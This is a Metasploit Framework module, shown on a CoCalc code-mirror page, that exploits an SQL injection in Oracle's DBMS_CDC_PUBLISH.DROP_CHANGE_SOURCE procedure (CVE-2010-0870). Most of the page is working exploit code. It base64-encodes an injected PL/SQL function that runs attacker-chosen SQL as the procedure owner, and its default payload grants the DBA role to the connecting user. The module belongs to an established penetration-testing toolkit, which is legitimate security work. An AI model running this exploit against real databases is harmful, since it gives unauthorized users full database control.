CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/sqli/oracle/dbms_cdc_publish2.rb
Views: 1904
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::ORACLE

8


9
  def initialize(info = {})

10
    super(update_info(info,

11
      'Name'           => 'Oracle DB SQL Injection via SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE',

12
      'Description'    => %q{

13
        The module exploits an sql injection flaw in the DROP_CHANGE_SOURCE

14
        procedure of the PL/SQL package DBMS_CDC_PUBLISH. Any user with execute privilege

15
        on the vulnerable package can exploit this vulnerability. By default, users granted

16
        EXECUTE_CATALOG_ROLE have the required privilege.

17
      },

18
      'Author'         => [ 'MC' ],

19
      'License'        => MSF_LICENSE,

20
      'References'     =>

21
        [

22
          [ 'CVE', '2010-0870' ],

23
          [ 'OSVDB', '63772'],

24
          [ 'URL', 'http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpuapr2010.html' ]

25
        ],

26
      'DisclosureDate' => '2010-04-26'))

27


28
      register_options(

29
        [

30
          OptString.new('SQL', [ false, 'SQL to execute.', "GRANT DBA TO #{datastore['DBUSER']}"]),

31
        ])

32
  end

33


34
  def run

35
    return if not check_dependencies

36


37
    name  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

38
    var1  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

39
    var2  = Rex::Text.rand_text_alpha_upper(rand(10) + 1)

40


41
    function = "

42
CREATE OR REPLACE FUNCTION #{name}

43
RETURN VARCHAR2 AUTHID CURRENT_USER

44
IS

45
PRAGMA AUTONOMOUS_TRANSACTION;

46
BEGIN

47
EXECUTE IMMEDIATE '#{datastore['SQL']}';

48
COMMIT;

49
RETURN NULL;

50
END;

51
    "

52


53
    package = "

54
BEGIN

55
SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE('''||'||user||'.#{name}||''');

56
END;

57
    "

58


59
    uno  = Rex::Text.encode_base64(function)

60
    dos  = Rex::Text.encode_base64(package)

61


62
    encoded_sql = %Q|

63
DECLARE

64
#{var1} VARCHAR2(32767);

65
#{var2} VARCHAR2(32767);

66
BEGIN

67
#{var1} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{uno}')));

68
EXECUTE IMMEDIATE #{var1};

69
#{var2} := utl_raw.cast_to_varchar2(utl_encode.base64_decode(utl_raw.cast_to_raw('#{dos}')));

70
EXECUTE IMMEDIATE #{var2};

71
END;

72
    |

73


74
    print_status("Attempting sql injection on SYS.DBMS_CDC_PUBLISH.DROP_CHANGE_SOURCE...")

75
    prepare_exec(encoded_sql)

76
    print_status("Done...")

77


78
  end

79
end

80


81